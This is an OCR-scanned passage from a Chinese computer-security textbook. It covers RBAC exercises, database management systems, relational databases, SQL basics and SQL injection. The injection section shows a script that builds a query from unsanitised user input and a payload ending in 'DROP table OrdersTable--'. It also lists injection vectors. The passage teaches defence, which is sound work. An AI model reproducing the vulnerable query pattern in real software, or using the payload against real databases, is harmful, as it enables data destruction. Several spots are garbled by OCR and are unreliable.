威胁 ? 图 4-15 VAX/VMS 访问 模式 
在 4.4 节 描述 的 传统 UNIX 文件 访问 模型 中 ，UNIX 系统 对 新 
创建 的 文件 和 目录 提供 了 默认 的 设置 ， 属 主 可 以 随后 更 改 。 默 认 值 一 般 是 属 主 完 全 访问 与 下 列 情况 
之 一 的 组 合 : 同 组 用 户 和 其 他 用 户 没有 访问 权 ; 同 组 用 户 能 进行 读 / 执行 访问 ， 其 他 用 户 没有 访问 
权 ; 同 组 用 户 和 其 他 用 户 都 能 进行 读 / 执行 访问 。 简 要 讨论 每 种 情况 的 优 缺点 ， 并 举例 说 明 每 种 情 
况 适用 于 哪 种 类 型 的 组 织 。 
考虑 为 用 户 Web 区 域 提供 访问 的 Web 服务 器 系统 的 用 户 账户 。 一 般 地 ， 在 用 户 的 主 目录 中 使 用 标 
准 的 目录 名 如 “ public_html” 作 为 用 户 Web 区 域 。 然 而 ,为 了 允许 Web 服务 器 访问 这 个 目录 下 的 
页 面 ， 它 必须 至 少 具有 对 该 用 户主 目录 的 搜索 (执行 ) 权 、 对 Web 目录 的 读 / 执 行 权 及 对 其 中 所 有 
页 面 的 读 权 。 考 虑 这 个 要 求 对 上 一 题 讨论 的 情况 的 影响 。 这 个 要 求 将 产生 什么 结果 ? 注意 Web ik 
务 器 一 般 作 为 特殊 用 户 执行 ， 它 所 在 的 组 不 能 包括 系统 中 大 多 数 用 户 。 是 否 在 有 些 环境 下 运行 这 种 
Web 服务 并 不 是 非常 合适 ? 解释 之 。 
假定 一 个 系统 具有 N 个 工作 职位 。 对 于 工作 职位 i， 用 户 数 为 U:， 需 要 的 许可 数 为 Pi。 
a. 对 于 传统 的 DAC 方案 ， 必 须 定义 多 少 个 用 户 与 许可 之 间 的 关系 ? 
b. 对 于 RBAC 方案 ， 必 须 定义 多 少 个 用 户 与 许可 之 间 的 关系 ? 





4.9 NIST RBAC 标准 定义 了 受 限 角色 层次 ， 其 中 一 个 角色 可 以 具有 一 个 或 多 个 直接 祖先 ， 但 被 限制 只 能 


有 一 个 直接 后 代 。 那 么 ， 图 4-10 中 哪些 继承 关系 是 被 NIST 标准 中 的 受 限 角色 层次 所 禁止 的 ? 


4.10 对 于 NIST RBAC 标准 ， 我 们 可 以 定义 通用 角色 层次 如 下 : RHCROLESXROLES 是 继承 关系 


ROLES 上 的 偏 序 关系 ， 写 为 这 。 六 宇 r 仅 当 x 的 所 有 许可 也 是 的 许可 且 的 所 有 用 户 也 是 
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的 用 户 。 定 义 集合 authorized_permission (r) 为 与 角色 r; 关 联 的 所 有 许可 的 集合 。 最 后 ， 结 点 7 是 
n 的 直接 子孙 表示 为 n>n, nn 且 ri 与 的 角色 层次 间 没 有 角色 。 
a 使 用 上 面 的 定义 (根据 需要 )， 给 出 通用 角色 层次 的 形式 定义 。 
b. 给 出 受 限 角色 层次 的 形式 化 定义 。 
4.11 在 4.8 节 的 例子 中 ， 用 符号 Role (x). Position 表示 与 角色 x 关联 的 职位 ， 用 Role (x). Function 表示 
与 角色 x 关联 的 职责 。 
a. 我 们 定义 这 个 例子 的 角色 层次 为 : 一 个 角色 比 另 一 个 角色 高 级 ， 当 前 者 比 后 者 职位 高 并 且 它 们 
的 职责 相同 。 形 式 化 表示 这 种 关系 。 
b. 另 一 种 备 选 的 角色 层次 是 : 一 个 角色 比 另 一 个 角色 高 级 ， 仅 当前 者 比 后 者 职位 高 ,不 考虑 职位 
因素 。 形 式 化 表示 这 种 关系 。 
4.12 在 4.6 节 的 网 上 娱乐 商店 例子 中 ， 对 于 包含 高 级 用 户 和 普通 用 户 的 细 粒 度 策略 ， 列 出 需要 为 RBAC 
模型 定义 的 所 有 角色 和 所 有 特权 。 
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学 习 目 标 

学 习 完 本 章 之 后 ， 你 应 该 能 够 : 

© 理解 数据 库 安 全 不 同 于 普通 计算 机 安全 措施 的 独特 需求 ; 
概述 数据 库 管 理 系统 的 基本 要 素 ; 

概述 关系 数据 库 系统 的 基本 要 素 ; 

定义 和 解释 SQL 注入 攻击 ; 

比较 和 对 比 数据 库 访问 控制 的 各 种 不 同方 法 ; 
解释 推理 在 数据 库 系统 中 是 如 何 导 致 安全 威胁 的 ; 
探讨 数据 库 系 统 中 加 密 技 术 的 应 用 问题 ; 

概述 云 计算 的 相关 概念 ; 

理解 与 云 计算 相关 的 独特 的 安全 问题 。 


本 章 讨 论 数据 库 领域 独 有 的 安全 问题 ， 重 点 考虑 的 是 关系 数据 库 管 理 系 统 (Relational 
DataBase Management System，RDBMS ) 。 关 系 方法 在 工业 、 政 府 和 研究 部 门 都 已 经 得 到 广泛 
应 用 ， 占 据 着 主导 地 位 ， 并 将 在 可 预见 的 未 来 继续 保持 这 种 势头 。 我 们 首先 概述 针对 数据 库 的 
安全 技术 的 需求 。 接 着 简要 地 介绍 数据 库 管 理 系统 并 概述 关系 数据 库 。 然 后 讨论 数据 库 访 问 控 
制 问题 及 推理 威胁 问题 。 接 下 来 分 析 数 据 库 加 密 问题 。 最 后 介绍 由 于 云 计算 技术 的 使 用 而 导致 
的 安全 问题 。 


5.1 数据库 安全 需求 


一 些 组 织 或 机 构 的 数据 库 系 统 趋向 于 将 敏感 信息 集中 存储 在 一 个 单一 的 逻辑 系统 中 。 这 些 
敏感 信息 涉及 : 

© 企业 的 财务 数据 

© 保密 的 电话 记录 

。 客户 和 员工 信息 ， 如 姓名 、 社 会 保险 号 、 银 行 账号 信息 和 信用 卡 信息 等 

e 专利 产品 信息 

° 保健 信息 和 医疗 记录 

对 于 许多 商家 和 其 他 的 组 织 或 机 构 来 讲 ， 人 允许 其 客户 、 合 作 伙伴 和 员工 对 上 述 所 提 到 的 
信息 进行 访问 是 非常 必要 的 。 但 这 些 信息 有 可 能 成 为 来 自 内 部 和 外 部 的 诸如 滥用 和 非 授权 的 更 
改 等 威胁 的 目标 。 因 此 ， 针 对 数据 库 的 安全 问题 已 经 成 为 整个 组 织 或 机 构 安全 策略 的 重要 组 成 
部 分 。 

[BENN06] 引用 了 一 些 资 料 ， 用 以 说 明 数 据 库 安 全 始终 没有 跟 上 数据 库 应 用 发 展 步 伐 的 原 
因 。 这 些 原因 包括 : 

1. 现代 数据 库 管理 系统 (DBMS) 的 复杂 程度 与 用 于 保护 这 些 系 统 的 安全 技术 是 极为 不 匹 
配 的 。 事 实 上 ，DBMS 是 非常 复杂 的 、 大 型 的 软件 系统 ， 其 提供 了 很 多 的 工作 选项 ， 我 们 需要 
对 所 有 这 些 选项 有 清楚 的 理解 ， 接 下 去 才能 进行 很 好 的 保护 以 防止 数据 唱 到 破坏 。 尽 管 当前 安 
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全 保护 技术 取得 了 很 大 进展 ,但 DBMS 复杂 程度 不 断 增 加 ， 即 许多 新 的 特性 和 服务 不 断 地 增 
加 ， 导 致 许多 新 的 安全 漏洞 和 潜在 的 误 用 不 断 出 现 ， 形 成 新 的 安全 威胁 。 

2. 数据 库 系统 拥有 非常 成 熟 的 交互 协议 ， 被 称 为 结构 化 查询 语言 (SQL)， 它 非常 复杂 ， 例 
如 比 Web 服务 中 进行 交互 所 使 用 的 超 文本 传输 协议 (HTTP) 要 复杂 得 多 。 要 想 有 效 地 保证 数 
据 库 安全 ， 需 要 在 全 面 理解 SQL 存在 的 弱点 的 基础 上 ， 制 定 适当 的 安全 策略 。 

3. 一 个 组 织 或 机 构 通常 缺少 专职 的 数据 库 安全 管理 人 员 ， 这 样 的 后 果 是 安全 需求 与 安全 保 
障 能 力 的 不 匹配 。 大 多 数组 织 都 有 员工 担任 数据 库 管 理 员 的 角色 ， 其 工作 是 管理 数据 库 系统 ， 
目标 是 保证 数据 库 系 统 的 可 用 性 、 性 能 、 正 确 性 和 易 用 性 。 这 类 系统 管理 员 可 能 具备 的 安全 技 
术 知 识 有 限 ， 掌 握 和 应 用 安全 技术 进行 管理 的 时 间 也 有 限 。 另 一 方面 ， 组 织 中 那些 负责 安全 的 
人 员 也 可 能 具有 较 少 的 数据 库 知 识 和 DBMS 技术 。 

4. 大 多 数 的 企业 环境 是 由 多 种 数据 库 平 台 (如 Oracle, IBM DB1 和 Informix、 微 软 和 
Sybase 等 )、 企 业 平台 (如 Oracle 电子 商务 套件 、PeopleSoft、SAP 和 Siebel 等 ) 和 操作 系统 平 
(UNIX, Linux, z/OS 和 Windows 等 ) 构成 的 一 个 异 构 环 境 , .这 很 大 程度 上 增加 了 安全 管理 
人 员 进 行 安全 管理 的 难度 。 

另外 一 个 最 新 的 挑战 是 ， 一 些 组 织 对 云 技术 的 依赖 程度 正 变 得 越 来 越 高 ， 将 企业 的 部 分 或 
全 部 的 数据 存储 到 云 上 ， 这 无 疑 增加 了 企业 中 负责 安全 的 员工 的 负担 。 


5.2 数据 库 管 理 系统 


有 些 情况 下 ， 一 个 组 织 在 仅 有 相对 简单 的 数据 文件 集合 的 情况 下 就 能 正常 运转 。 每 个 文件 
可 能 包含 文本 〈 如 备忘录 和 报告 ) 或 者 数值 数据 (如 电子 表格 )， 内 容 更 详细 的 文件 由 一 组 记录 
组 成 。 然 而 ， 对 于 任何 一 个 较 大 规模 的 组 织 来 说 ， 则 需要 一 种 叫 作 数据 库 的 更 复杂 的 结构 。 数 
HÈ (database) 是 存储 一 个 或 多 个 应 用 所 用 数据 的 结构 化 数据 集合 。 除 去 数据 ， 数 据 库 还 包 
含 数据 项 之 间 以 及 数据 项 组 之 间 的 关系 和 联系 。 下 面 这 个 例子 说 明了 数据 文件 和 数据 库 之 间 的 
区 别 。 一 个 简单 的 人 事 文 件 可 能 包含 一 组 记录 。 每 条 记录 对 应 一 名 职工 ， 给 出 该 职工 的 姓名 、 
居住 地 址 、 出 生日 期 、 职 位 、 工 资 ， 以 及 人 事 部 门 需要 的 其 他 详细 的 信息 。 而 人 事 数据 库 除 了 
包括 上 面 描述 的 人 事 文件 之 外 ， 还 可 以 包含 考勤 文件 以 便 用 来 记录 每 名 职工 每 周 的 工作 小 时 
数 。 这 两 个 文件 通过 数据 库 机 制 关联 起 来 ， 
以 便 工 资 单 程序 (payroll program) 提取 出 
每 名 职工 的 工作 时 间 和 基本 薪水 并 生成 工 
资 单 。 

经 常 和 数据 库 一 并 提起 的 另 一 个 概念 
是 数据 库 管 理 系统 ( DataBase Management 
System，DBMS)， 它 是 创建 、 维 护 数据 库 
并 为 多 个 用 户 和 应 用 提供 特定 的 查询 服务 
的 程序 套件 。 查 询 语言 (query language) 为 
用 户 和 应 用 提供 了 访问 数据 库 的 统一 接口 。 

图 5-1 给 出 了 DBMS 体系 结构 简化 
的 框图 。 开 发 者 使 用 数据 定义 语言 ( Data 
Definition Language, DDL) 来 定义 数据 
库 的 逻辑 结构 和 过 程 属性 ， 将 其 表示 为 ”DDL= 数 据 定义 语言 
一 组 数据 库 描述 表 (database description DML= 数 据 操纵 语言 
table) 。 数 据 操纵 语言 ( Data Manipulation 图 5-1 DBMS 体系 结构 
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Language, DML) 为 应 用 开发 者 提供 了 一 组 强大 的 工具 。 查 询 语言 是 为 终端 用 户 设计 的 说 明 
性 语言 。 数 据 库 管理 系统 利用 数据 库 描 述 表 来 管理 物理 数据 库 。 访 问 数据 库 的 接口 是 文件 管 
理 器 模块 和 事务 管理 器 模块 。 除 去 数据 库 描述 表 之 外 ， 还 有 两 个 表 用 来 支持 DBMS : 授权 表 
( authorization table) 用 于 确保 用 户 具有 执行 数据 库 查 询 语句 的 权限 ; 并 发 访问 表 (concurrent 
access table) 用 在 同时 执行 冲突 命令 时 ， 避 免 产 生 冲 突 。 

数据 库 系统 对 于 海量 数据 提供 了 高 效 的 访问 ， 这 对 于 很 多 组 织 的 业务 运转 是 至 关 重要 的 。 
由 于 这 些 业务 的 复杂 性 和 关键 性 ， 数 据 库 系 统 产 生 了 新 的 安全 需求 ， 这 些 需 求 超出 了 一 般 的 基 
于 OS 的 安全 机 制 或 者 独立 的 安全 包 (stand-alone security package) 所 具有 的 能 力 。 

操作 系统 的 安全 机 制 一 般 控制 对 整个 文件 的 读 写 访问 ， 所 以 它 可 以 用 来 控制 是 否 允 许 用 户 
读 写 某 个 文件 (例如 和 人事 文件 ) 中 的 任何 信息 ， 但 不 能 用 来 限制 访问 该 文件 中 的 具体 记录 或 字 
Eto DBMS 却 人 允许 指定 这 种 更 精细 的 访问 控制 。 它 通常 还 能 实现 对 更 多 的 命令 施加 访问 控制 ， 
比如 选择 、 插 入 、 更 新 或 者 删除 数据 库 中 的 指定 项 。 因 而 ， 专 为 数据 库 系 统 设计 并 与 其 集成 在 
一 起 的 安全 服务 和 安全 机 制 是 必需 的 。 


5.3 ”关系 数据 库 


关系 数据 库 的 基本 构件 是 数据 表 。 数 据 表 类 似 于 电子 表格 ， 由 行 和 列 组 成 。 每 列 包含 某 
种 类 型 的 数据 ， 每 行 包含 这 些 列 的 一 组 指定 值 。 理 想 情 况 下 ， 表 中 至 少 存在 一 列 ， 其 值 是 唯 
一 的 ， 作 为 指定 项 的 标识 符 。 例 如 ， 一般 的 电话 号 码 簿 中 ， 每 一 项 表示 一 个 用 户 ， 其 中 各 列 
分 别 表示 姓名 、 电 话 号 码 和 地 址 。 这 样 的 表 叫 作 平面 文件 (flat fle)， 因 为 它 是 单一 的 二 维 数 
据 。 在 平面 文件 中 ， 所 有 的 数据 都 存储 在 单个 表 中 。 对 于 电话 号 码 短 ， 可 能 若干 用 户 具 有 相同 
的 姓名 ， 但 电话 号 码 应 该 是 唯一 的 。 因 此 以 电话 号 码 作为 一 行 的 唯一 标识 符 。 然 而 ， 使 用 相同 
电话 号 码 的 两 个 或 多 个 人 可 能 都 列 在 号 码 短 中 。 为 了 继续 将 电话 号 码 短 的 所 有 数据 保持 在 单个 
表 中 ， 并 为 每 行 提供 唯一 的 标识 符 ， 我 们 可 以 分 离 出 新 的 列表 示 该 号 码 的 第 二 用 户 、 第 三 用 户 
等 。 这 样 ， 对 于 正在 使 用 的 每 个 电话 号 码 ， 在 表 中 都 有 唯一 项 与 之 对 应 。 

使 用 单个 表 的 缺点 是 某 一 行 的 某 些 列 位 置 可 能 是 空 的 (没有 使 用 )。 而 且 ， 每 当 有 新 服务 
或 者 新 信息 合成 到 数据 库 中 时 ， 必 须 添加 更 多 的 列 ， 数 据 库 和 相关 软件 也 必须 重新 设计 、 重 新 
构建 。 

关系 数据 库 的 结构 使 得 多 个 表 通 过 在 所 有 表 中 都 出 现 的 唯一 标识 符 联系 在 一 起 。 图 5-2 显 
示 了 在 不 重建 主 表 的 情况 下 ， 如 何 将 新 的 服务 和 特征 添加 到 电话 数据 库 中 。 在 这 个 例子 中 ， 主 
表 包 含 每 个 电话 号 码 的 基本 信息 。 电 话 号 码 作为 主键 。 数 据 库 管理 员 可 以 接着 定义 新 表 ， 其 中 
一 列 是 前 面 定义 的 主键 ， 其 他 列 包含 其 他 信息 。 

用 户 和 应 用 通过 关系 查询 语言 来 访问 数据 库 。 查 询 语 言 使 用 的 是 说 明 性 语句 而 不 是 编程 语 
言 的 过 程 性 指令 。 一 般 来 说 ,查询 语言 允许 用 户 请 求 满足 一 组 给 定 条 件 的 记录 中 的 选 定数 据 项 。 
然后 ， 软 件 决定 如 何 从 一 个 或 多 个 表 中 提取 出 所 请 求 的 数据 。 例 如 ， 电 话 公 司 代 理 能 够 检索 出 
用 户 的 账单 信息 以 及 特殊 服务 或 最 近 收缴 话费 的 状态 ， 所 有 检索 出 的 信息 都 显示 在 屏幕 上 。 


5.3.1 关系 数据 库 系 统 要 素 


在 关系 数据 库 术 语 中 ， 基 本 构件 是 平面 表 一 一 关系 〈relation )。 行 被 称 为 元 组 (tuple)， 列 
被 称 为 属性 (attribute)( 表 5-1 )。 主 键 (primary key) 用 来 唯一 地 标识 表 的 一 行 ， 它 由 一 个 或 多 
个 列 名 组 成 。 在 图 5-2 的 例子 中 ， 单 一 属性 (电话 号 码 ) 完全 可 以 唯一 标识 特定 表 中 的 每 一 行 。 
图 5-3 给 出 了 一 个 关系 数据 库 表 的 抽象 模型 ， 其 中 包括 NN 个 个 体 (或 称 实体 ) 和 MM 个 属性 。 每 
一 个 属性 4; 有 |4 个 可 能 的 取 值 ， 而 x, 表示 实体 i 的 j 属 性 的 取 值 。 
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图 5-2 关系 数据 库 模型 举例 。 关 系数 据 库 通过 图 $3 SRAM 
指定 的 键 将 多 个 表 关联 起 来 ; 本 例 中 ， 
键 是 电话 号 码 字段 


表 5-1 关系 数据 库 的 基本 术语 





要 创建 两 个 表 之 间 的 联系 ， 在 一 个 表 中 定义 为 主键 的 属性 必须 作为 另 一 个 表 的 属性 出 现 ， 
称 为 后 者 的 外 键 (foreign key)。 主 键 的 值 对 于 它 所 在 的 表 中 的 每 个 元 组 ( 行 ) 必须 是 唯一 的 ， 
而 外 键 的 值 在 表 中 可 以 多 次 出 现 ， 因 此 主键 所 在 的 表 中 的 一 行 与 外 键 所 在 的 表 中 的 多 行 之 间 
是 一 对 多 的 关系 。 图 5-4a 给 出 一 个 例子 。 在 Department 表 中 ， 部 门 ID (Did) 是 主键 ,每 个 
值 都 是 唯一 的 。 该 表 给 出 了 每 个 部 门 的 ID 、 名 字 (Dname) 和 账号 ( Dacctno)。Employee RE 
含 每 个 职工 的 姓名 ( Ename)、 工 资 代 码 (Salary Code), HAT ID (Eid) 和 电话 号 码 ( Ephone)。 
Employee 表 还 通过 Did 字段 指出 了 每 个 职工 所 属 的 部 门 。Did 是 Employee 表 的 外 键 ， 它 建立 
了 Employee 表 和 Department 表 之 间 的 联系 。 

视图 (view) 是 一 个 虚 表 。 本 质 上 ， 视图 是 从 一 个 或 多 个 表 中 返回 的 选 定 行 与 列 的 查询 结 
果 。 图 5-4b 是 一 个 视图 ， 包 括 Employee 表 中 的 职工 名 、ID、 电 话 号 码 和 Department 表 中 对 
应 的 部 门 名 ， 通 过 Did 字段 将 两 个 表 连接 起 来 。 因 此 视图 中 既 包 含 来 自 Employee 表 每 行 的 数 
据 ， 还 包含 来 自 Department 表 的 附加 数据 。 视图 也 可 以 由 单个 表 创 建 。 例 如 ，Employee 表 的 
一 个 视图 可 以 包含 其 所 有 行 ， 但 工资 代码 字段 被 删除 。 视 图 可 以 被 限定 仅仅 包含 某 些 行 或 某 些 
列 。 例 如 ， 一 个 视图 可 以 定义 为 包含 Employee 表 中 Did=15 的 所 有 行 。 

视图 经 常用 于 安全 目的 。 视 图 能 够 提供 对 关系 数据 库 的 受 限 访问 ， 因 而 用 户 或 应 用 只 能 访 
问 某 些 行 或 列 。 


5.3.2 ”结构 化 查询 语言 
结构 化 查询 语言 (Structure Query Language，SQL)， 最 初 是 由 IBM 于 20 世纪 70 年 代 中 期 
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开发 的 ， 是 能 够 对 关系 数据 库 中 的 数据 进行 定义 、 操 纵 和 查询 的 标准 语言 。ANSIISO 制订 的 
SQL 标准 有 几 个 版 本 ， 并 有 多 种 不 同 的 实现 ， 但 都 遵循 相同 的 基本 语法 和 语义 。 


Department 表 Employee# 
| Dname | Dacctno | [Ename [Did | Salarycode | | Ephome 
mea | [2 [ass orzo 
Fs feducation | 202035 | [Nei 
* (9 faccounts . | 709257 | 
| 13 [public relations | 755827 | 
| 223945 | 


| 15 | Services 


2976 | 6127091745 
mi 6127099380 
5088 | 6127092246 


2345 | 6127092485 








b) 从 关系 数据 库 导 出 的 视图 
图 5-4 关系 数据 库 实例 


例如 ， 图 5-4a 中 的 两 个 表 定义 如 下 : 


CREATE TABLE department ( 
Did INTEGER PRIMARY KEY, 
Dname CHAR (30), 

Dacctno CHAR (6) ) 

CREATE TABLE employee ( 
Ename CHAR (30), 

Did INTEGER, 

SalaryCode INTEGER, 

Eid INTEGER PRIMARY KEY, 

Ephone CHAR (10), 

FOREIGN KEY (Did) REFERENCES department (Did) ) 


检索 信息 的 基本 命令 是 SELECT 语句 。 请 看 下 面 这 个 例子 : 


SELECT Ename, Eid, Ephone 
FROM Employee 
WHERE Did = 15 161 


l 
这 个 查询 从 Employee 表 返 回 15 号 部 门 的 所 有 职工 的 Ename、Eid 和 Ephone 字段 。 162 
图 5-4b 中 的 视图 是 通过 下 面 的 SQL 语句 建立 的 : 
CREATE VIEW newtable (Dname, Ename, Eid, Ephone) 
AS SELECT D.Dname E.Ename, E.Eid, E.Ephone 


FROM Department D Employee E 
WHERE E.Did = D.Did 


前 面 列 举 的 仅仅 是 SQL 功能 的 几 个 例子 。SQL 语句 能 够 创建 表 、 插 入 和 删除 表 中 的 数据 、 
创建 视图 、 通 过 查询 语句 检索 数据 。 
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5.4 SQL 注入 攻击 


SQL EA ( 简 记 为 SQLi) 攻击 是 一 类 针对 数据 库 的 最 普遍 和 最 危险 的 基于 网 络 的 安全 威 
胁 。 请 看 下 面 报道 : 

1. 2013 Æ 7 H 的 Imperva Web 应 用 攻击 报告 (Imperva Web Application Attack Report ) 
[IMPE13] 调查 了 一 些 工业 企业 的 Web 应 用 服务 器 和 被 监视 的 八 种 常见 的 攻击 方式 。 调 查 发 
现 ， 在 所 发 生 的 全 部 攻击 事件 的 总 数 、 每 类 攻击 事件 的 攻击 请 求 总 数 、 一 个 月 内 某 应 用 遭受 至 
少 一 次 攻击 事件 的 平均 天 数 等 指标 上 ，SQLi 攻击 均 名 列 第 一 位 或 第 二 位 。Imperva 还 发 现 一 天 
之 内 某 Web 站 点 竟然 收 到 过 高 达 94 075 个 SQLi 攻击 请 求 。 

2. 开 放 Web 应 用 安全 项 目 (The Open Web Application Security Project) 2013 年 的 报告 
[OWAS13] 中 关于 最 重要 的 十 大 Web 应 用 安全 威胁 中 就 包含 了 注入 攻击 ， 而 SQLi 攻击 则 名 列 
榜首 。 这 份 排名 从 2010 年 的 报告 开始 一 直 没 有 改变 过 。 

3. Veracode 2013 年 软件 安全 状况 报告 (The Veracode 2013 State of Software Security 
Report) [VERA13] 指出 ， 被 SQLi 攻击 影响 的 应 用 的 比例 大 约 占 32%， 而 在 所 有 的 攻击 造成 
的 损失 中 ，SQLi 攻击 的 破坏 占据 了 26%. Veracode 也 将 其 列 为 最 严重 的 威胁 之 一 。 报 告 还 指 
出 ，2012 年 发 生 的 3 个 最 严重 的 SQLi 攻击 事件 导致 了 成 千 上 万 的 电子 邮件 地 址 、 用 户 名 和 口 
令 被 泄露 和 破坏 。 

4. Trustwave 2013 年 全 球 安全 报告 ( The Trustwave 2013 Global Security Report) [TRUS13] 
将 SQLi 攻击 列 为 两 种 最 重要 的 攻击 技术 之 一 。 报 告 指出 ， 如 果 不 是 已 有 适当 的 安全 手段 可 以 
阻止 SQL 注入 攻击 的 发 生 ， 不 良 的 编码 习惯 可 能 使 得 这 些 攻击 能 够 存在 至 少 15 年 以 上 。 

一 般 来 说 ，SQLi 攻击 是 从 利用 Web 应 用 的 页 面 特 征 人 手 而 设计 的 。 与 静态 页 面相 比 ， 当 
前 更 多 的 Web 站 点 拥有 动态 组 件 和 内 容 。 许 多 这 样 的 页 面 可 以 请 求 信息 ， 如 位 置信 息 、 个 人 
身份 信息 和 信用 卡 信息 等 。 这 些 动态 的 内 容 一 般 需 要 传输 到 后 台数 据 库 或 者 是 从 后 台数 据 库 传 
输出 来 ， 而 后 台数 据 库 中 往往 存 有 大 量 的 信息 ， 例 如 从 持 卡 人 数据 到 经 常 购买 的 跑鞋 的 类 型 
等 数据 。 应 用 的 服务 器 Web 页 面 将 通过 SQL 查询 语句 ee le ee ee 
息 ， 用 以 满足 用 户 体 验 。 

在 这 样 的 环境 中 ， 通 过 发 送 恶意 的 SQL 命令 到 数据 库 服务 器 可 以 发 起 SQLi sie. 最 常见 
的 攻击 目标 是 大 量 地 从 数据 库 中 提取 数据 。 攻 击 者 可 以 向 数据 库 中 的 表 发 送 大 量 的 恶意 请 求 ， 
而 这 些 表 中 含有 成 千 上 万 的 客户 记录 。 依 据 不 同 的 工作 环境 ，SQL 注入 也 可 用 于 修改 和 删除 数 
据 ， 执 行 任 意 的 操作 系统 命令 ， 或 者 发 起 拒绝 服务 (DoS) 攻击 。 


5.4.1 一 种 典型 的 SQLi 攻击 


SQLi 是 一 种 利用 数据 库 层 应 用 (例如 查询 ) 中 存在 的 安全 漏洞 而 发 起 的 攻击 。 使 用 SQL 
注 和 人， 攻击 者 可 以 提取 或 操纵 Web 应 用 的 数据 。 用 户 的 输入 被 当 作 峙 入 在 SQL 语句 中 的 字符 
串 转 义 字符 而 被 错误 地 过 滤 或 者 用 户 输入 不 是 强 类 型 而 被 意外 执行 ， 在 这 两 种 情形 下 都 可 能 发 
Æ SQL 注入 攻击 。 

5-5 摘自 [ ACUN13 ]， 是 一 个 典型 的 SQLi 攻击 的 例子 。 所 涉及 的 步骤 如 下 : 

1. 攻击 者 找到 Web 应 用 的 脆弱 点 ， 然 后 通过 向 Web 服务 器 发 送 命令 来 对 数据 库 注 人 SQL 
命令 。 这 些 命令 被 注入 网 络 流量 中 ， 然 后 传送 到 防火 墙 。 

2. Web 服务 器 接收 到 恶意 代码 ， 然 后 发 送 给 Web 应 用 服务 器 。 

3. Web 应 用 服务 器 收 到 Web 服务 器 的 恶意 代码 后 ， 将 其 发 送 给 数据 库 服务 器 。 

4. 数据 库 服务 器 在 数据 库 上 执行 恶意 代码 。 数 据 库 从 信用 卡 表 中 返回 数据 。 

5. Web 应 用 服务 器 动态 地 生成 一 个 包含 数据 库 信用 卡 表 详 细 信 息 的 页 面 。 
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6. Web 服务 器 向 攻击 者 发 送信 用 卡 详细 信息 。 





图 5-5 典型 的 SQL 注 人 攻击 


| “5.4.2 注入 技术 


SQLi 攻击 的 方法 通常 是 在 SQL 语句 中 提前 终止 文本 串 ， 随 后 附加 新 的 命令 。 因 为 插入 的 
| ”命令 在 其 被 执行 前 可 能 含有 额外 附加 的 字符 种， 攻击 者 利用 注释 符 “ --” 来 终止 被 注 人 的 字符 
串 。 这 样 ， 后 面 的 文本 在 执行 时 就 被 忽略 了 。 

举 一 个 简单 的 例子 ， 考 虑 下 面 的 脚本 ， 其 中 的 SQL 查询 是 由 预定 义 字符 串 和 用 户 输入 的 
文本 组 合 而 成 的 : 


var Shipcity; 

ShipCity = Request.form (“ShipCity”) ; 

var sql = “select * from OrdersTable where ShipCity = '” + 
ShipCity + "'"; 


这 些 代 码 脚本 的 设计 者 的 意图 是 让 用 户 输入 城市 的 名 称 。 例 如 ， 当 脚本 执行 时 ， 用 户 被 提 
示 输 入 城市 名 称 ， 如 果 用 户 输入 Redmond， 那 将 生成 如 下 SQL 查询 语句 : 

SELECT * FROM OrdersTable WHERE ShipCity = ‘Redmond’ 

然而 如 果 用 户 输 入 如 下 语句 : 

Boston’; DROP table OrdersTable-- 


这 将 导致 如 下 的 SQL 查询 : 


SELECT * FROM OrdersTable WHERE ShipCity = 
‘Redmond’; DROP table OrdersTable-- 


上 述 查 询 语句 中 的 分 号 用 以 分 离 两 个 命令 ， 两 个 连接 号 则 表明 后 面 的 命令 都 被 注释 掉 而 不 
被 执行 。 当 SQL 服务 器 执行 这 一 语句 时 ， 它 将 首先 选择 OrdersTable where ShipCity is Redmond 
的 所 有 记录 。 然 后 ， 执 行 DROP 请 求 ， 将 整个 表 删 除 。 
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5.4.3 SQLi 攻击 途径 和 类 型 


各 种 SQL 注入 攻击 根据 其 攻击 途径 和 攻击 方式 的 不 同 都 有 其 各 自 的 特征 [CHANI], 
HALF06]。 主 要 的 攻击 途径 有 如 下 几 种 : 

e RAMA: 采用 这 一 方式 的 攻击 者 ， 通 过 精心 构造 用 户 输入 来 注入 SQL 命令 。Web 应 
用 程序 读 取 的 用 户 输入 允许 有 多 种 方式 ， 一 般 取决 于 不 同 的 应 用 部 署 的 环境 。 大 多 数 
SQL 注 人 攻击 针对 的 是 Web 应 用 程序 ， 用 户 输入 一 般 源 自 于 用 户 提交 的 表格 ， 经 由 
HTTP 的 GET 或 POST 请 求 发 送 到 服务 器 端 。Web 应 用 程序 通常 能 够 获取 这 些 请 求 中 
的 用 户 输入 ， 就 像 它们 能 够 访问 环境 中 的 任何 其 他 变量 一 样 。 

e 服务 器 变量 : 服务 器 变量 是 包含 HTTP 头 部 、 网 络 协议 头 部 、 环 境 变量 等 数据 的 变量 
集合 。Web 应 用 程序 使 用 服务 器 变量 的 场景 很 多 ， 例 如 日 志 统计 和 浏览 趋势 识别 。 如 
果 这 些 变量 不 经 过 处 理 就 直接 记录 在 数据 库 中 ， 则 可 能 会 产生 SQL 注 和 漏洞。 因为 攻 
击 者 能 够 构造 HTTP 和 网 络 报头 来 利用 这 一 漏洞 ， 将 数据 直接 安排 在 报头 中 ， 当 在 数 
据 库 中 执行 对 服务 器 变量 的 查询 语句 时 ， 报 头 中 的 攻击 语句 将 会 被 触发 。 

e 二 阶 注入 : 如 果 针 对 SQL 的 预防 机 制 不 够 完整 ， 可 能 会 出 现 二 阶 注 入 攻击 。 在 二 阶 注 
人 中 ， 恶 意 用 户 可 以 利用 系统 或 数据 库 中 已 存在 的 数据 来 触发 一 个 SQL 注入 攻击 ， 因 
此 当 这 种 攻击 出 现时 ， 引 发 攻击 的 输入 并 不 来 自 于 用 户 ， 而 是 来 自 于 系统 自身 。 

e cookie: 当 用 户 再 次 访问 之 前 已 访问 过 的 Web 应 用 程序 时 ，cookie 被 用 于 存储 用 户 的 
状态 信息 。 由 于 cookie 数据 是 在 客户 端 控制 的 ， 在 应 用 服务 器 利用 cookie 构造 SQL 
查询 时 ， 攻 击 者 可 以 通过 更 改 cookie 的 值 来 实现 SQL 查询 语句 的 构造 和 进行 查询 功能 
的 修改 。 

e 物理 用 户 输入 : 除了 Web 页 面 请 求 ， 还 有 其 他 可 以 被 用 于 SQL 注入 的 用 户 请 求 。 用 户 
输入 形式 可 以 是 常见 的 条 形 码 、 射 频 识 别 (RFID) 标签 ， 甚 至 是 能 够 利用 图 像 识 别 技 
术 扫描 然后 发 送 到 数据 库 系 统 的 纸 质 形式 。 

